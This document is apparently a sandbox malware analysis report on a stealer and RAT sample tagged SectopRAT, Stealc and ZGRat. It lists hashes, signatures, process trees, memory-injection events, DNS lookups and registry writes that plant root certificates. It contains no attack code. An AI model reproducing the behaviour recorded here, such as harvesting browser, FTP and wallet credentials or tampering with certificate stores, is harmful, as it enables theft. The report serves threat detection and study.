Malware Analysis Report

2024-12-08 01:39

Sample ID 240428-bqme8adb9y
Target 6781c522f3390cc4947959d168e61bbc.bin
SHA256 03ec55805a5f2294793d116bc75c7da56e7a791a20e198125beb7a5a52a16744
Tags
sectoprat stealc zgrat discovery rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

03ec55805a5f2294793d116bc75c7da56e7a791a20e198125beb7a5a52a16744

Threat Level: Known bad

The file 6781c522f3390cc4947959d168e61bbc.bin was found to be: Known bad.

Malicious Activity Summary

sectoprat stealc zgrat discovery rat spyware stealer trojan

ZGRat

Detect ZGRat V1

SectopRAT payload

SectopRAT

Stealc

Blocklisted process makes network request

Downloads MZ/PE file

Reads data files stored by FTP clients

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Suspicious use of SetThreadContext

Program crash

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-28 01:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:23

Platform

win10v2004-20240419-en

Max time kernel

67s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe

"C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsf3AB8.tmp\load.bat"

Network

Country Destination Domain Proto
US 8.8.8.8:53 dsepc5ud74wta.cloudfront.net udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 dsepc5ud74wta.cloudfront.net udp
US 8.8.8.8:53 g.bing.com udp

Files

C:\Users\Admin\AppData\Local\Temp\nsf3AB8.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

Analysis: behavioral3

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:23

Platform

win7-20240419-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2592 -s 236

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:23

Platform

win10v2004-20240419-en

Max time kernel

66s

Max time network

55s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 916 wrote to memory of 4104 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 916 wrote to memory of 4104 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 916 wrote to memory of 4104 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4104 -ip 4104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 624

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 g.bing.com udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-28 01:21

Reported

2024-04-28 01:23

Platform

win7-20240220-en

Max time kernel

138s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Stealc

stealer stealc

ZGRat

rat zgrat

Downloads MZ/PE file

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1544 set thread context of 2672 N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2672 set thread context of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ugs.3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ugs.3.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ugs.3.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\ugs.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\ugs.0.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2916 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe C:\Windows\SysWOW64\cmd.exe
PID 2916 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe C:\Windows\SysWOW64\cmd.exe
PID 2916 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe C:\Windows\SysWOW64\cmd.exe
PID 2916 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\1c6bb4115d8b51391fd600bc70d88a8e9cc9e6406cd7f626087ff4cead341784.exe C:\Windows\SysWOW64\cmd.exe
PID 2488 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2192 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2488 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2488 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2488 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\i1.exe
PID 2488 wrote to memory of 796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 796 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 604 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.0.exe
PID 604 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.0.exe
PID 604 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.0.exe
PID 604 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.0.exe
PID 604 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe
PID 604 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe
PID 604 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe
PID 604 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe
PID 604 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe
PID 604 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe
PID 604 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\i1.exe C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe
PID 1544 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 1544 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 1544 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 1544 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\ugs.2\run.exe C:\Windows\SysWOW64\cmd.exe
PID 2488 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2488 wrote to memory of 2492 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
